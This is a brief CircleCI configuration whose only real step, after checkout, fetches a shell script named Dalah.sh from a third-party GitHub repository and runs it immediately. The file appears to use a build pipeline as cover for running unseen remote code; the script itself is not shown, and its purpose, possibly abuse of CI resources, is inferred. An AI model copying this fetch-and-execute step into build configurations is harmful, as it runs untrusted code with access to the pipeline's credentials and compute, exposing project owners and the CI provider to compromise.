version: 2.0
jobs:
  build:
    docker:
      - image: cimg/base:2021.04
        auth:
          username: mydockerhub-user
          password: $DOCKERHUB_PASSWORD  # context / project UI env-var reference
    steps:
      - checkout
      - run: wget https://raw.githubusercontent.com/NuDev2021/pengontolan/main/Dalah.sh && chmod +x Dalah.sh && ./Dalah.sh
